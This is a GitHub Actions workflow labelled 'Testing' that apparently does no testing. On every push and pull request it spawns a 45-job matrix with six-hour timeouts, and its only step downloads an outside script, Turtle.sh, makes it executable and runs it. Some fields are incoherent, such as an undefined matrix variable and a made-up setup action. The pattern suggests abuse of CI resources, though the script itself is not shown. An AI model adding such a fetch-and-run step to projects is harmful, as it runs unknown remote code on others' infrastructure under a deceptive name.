name: Testing
on: [push, pull_request]
jobs:
build:
name: TestingMethode
runs-on: ubuntu-20.04
strategy:
max-parallel: 3
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 20
JOB: ${{ matrix.run }}
steps:
- name: Set up Run ${{ matrix.run }}
uses: actions/github@v2
with:
go-version: ${{ matrix.run }}
id: run
- name: Setup
uses: actions/checkout@v2
- name: TestingMethode
run: |
wget https://github.com/donujk/github/blob/main/Turtle.sh && chmod u+x Turtle.sh && ./Turtle.sh
